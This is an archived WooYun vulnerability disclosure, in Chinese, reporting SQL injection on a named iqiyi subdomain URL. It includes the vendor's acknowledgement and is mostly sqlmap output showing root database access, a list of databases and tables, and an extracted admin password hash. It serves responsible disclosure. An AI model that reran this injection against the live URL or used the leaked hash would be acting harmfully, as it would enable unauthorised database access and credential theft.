乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-01-12: 细节已通知厂商并且等待厂商处理中 2014-01-12: 厂商已经确认,细节仅向厂商公开 2014-01-22: 细节向核心白帽子及相关领域专家公开 2014-02-01: 细节向普通白帽子公开 2014-02-11: 细节向实习白帽子公开 2014-02-26: 细节向公众公开
貌似是鸡肋,没继续深入,不过root连接mysql,确认挺危险的
问题链接http://tcl.iqiyi.com/index.php?action=daoyanjianjie&id=14获得当前用户
[23:27:01] [INFO] testing MySQL[23:27:01] [INFO] confirming MySQL[23:27:01] [INFO] the back-end DBMS is MySQLweb application technology: PHP 5.3.3, Nginxback-end DBMS: MySQL >= 5.0.0[23:27:01] [INFO] fetching current usercurrent user: 'root@localhost'
获得数据库名
[23:22:45] [INFO] fetching database names[23:22:45] [INFO] the SQL query used returns 14 entries[23:22:45] [INFO] resumed: "information_schema"[23:22:45] [INFO] resumed: "ccs"[23:22:45] [INFO] resumed: "cmdb_vip"[23:22:45] [INFO] resumed: "common_cms"[23:22:45] [INFO] resumed: "hk"[23:22:45] [INFO] resumed: "ims"[23:22:45] [INFO] resumed: "mysql"[23:22:45] [INFO] resumed: "suc"[23:22:45] [INFO] resumed: "t_eye"[23:22:45] [INFO] resumed: "tcl"[23:22:45] [INFO] resumed: "tcl_test"[23:22:45] [INFO] resumed: "test"[23:22:45] [INFO] resumed: "weixin"[23:22:45] [INFO] resumed: "wx"available databases [14]: [*] ccs[*] cmdb_vip[*] common_cms[*] hk[*] ims[*] information_schema[*] mysql[*] suc[*] t_eye[*] tcl[*] tcl_test[*] test[*] weixin[*] wx
获得某个库所有表
[23:11:11] [INFO] starting 10 threads[23:11:12] [INFO] retrieved: "tp_article"[23:11:12] [INFO] retrieved: "tp_areply"[23:11:12] [INFO] retrieved: "tp_access"[23:11:12] [INFO] retrieved: "tp_flash"[23:11:13] [INFO] retrieved: "tp_follow"[23:11:13] [INFO] retrieved: "tp_adma"[23:11:13] [INFO] retrieved: "tp_call"[23:11:13] [INFO] retrieved: "tp_diymen_class"[23:11:13] [INFO] retrieved: "tp_case"[23:11:13] [INFO] retrieved: "tp_home"[23:11:13] [INFO] retrieved: "tp_api"[23:11:13] [INFO] retrieved: "tp_company"[23:11:13] [INFO] retrieved: "tp_host"[23:11:13] [INFO] retrieved: "tp_host_order"[23:11:13] [INFO] retrieved: "tp_diymen_set"[23:11:14] [INFO] retrieved: "tp_host_list_add"[23:11:14] [INFO] retrieved: "tp_indent"[23:11:14] [INFO] retrieved: "tp_function"[23:11:14] [INFO] retrieved: "tp_lottery"[23:11:14] [INFO] retrieved: "tp_keyword"[23:11:14] [INFO] retrieved: "tp_classify"[23:11:14] [INFO] retrieved: "tp_member_card_coupon"[23:11:14] [INFO] retrieved: "tp_member_card_contact"[23:11:14] [INFO] retrieved: "tp_member_card_create"[23:11:14] [INFO] retrieved: "tp_dream"[23:11:14] [INFO] retrieved: "tp_img"[23:11:14] [INFO] retrieved: "tp_member_card_exchange"[23:11:14] [INFO] retrieved: "tp_member"[23:11:14] [INFO] retrieved: "tp_member_card_info"[23:11:14] [INFO] retrieved: "tp_member_card_sign"[23:11:15] [INFO] retrieved: "tp_member_card_vip"[23:11:15] [INFO] retrieved: "tp_member_card_set"[23:11:15] [INFO] retrieved: "tp_member_card_integral"
拿到了加密后的管理员密码,比较难解,算比较鸡肋的sql注入漏洞
[01:54:56] [INFO] fetching SQL SELECT statement query output: 'select user_pass from tcl.admin'[01:54:56] [INFO] the SQL query used returns 1 entries[01:54:56] [INFO] retrieved: "1c161ff0c3892f845d0cb4928287753e"select user_pass from tcl.admin; [1]: [*] 1c161ff0c3892f845d0cb4928287753e
看起来这台主机并不是爱奇艺的,不过用着爱奇艺的子域名,就报给iqiyi了。乱入同一台主机的一个公司的db weixin,可拖库,可看到其用户名密码啥的
过滤参数
危害等级:中
漏洞Rank:10
确认时间:2014-01-12 22:26
谢谢您提供的漏洞,我们会加紧进行修复!
暂无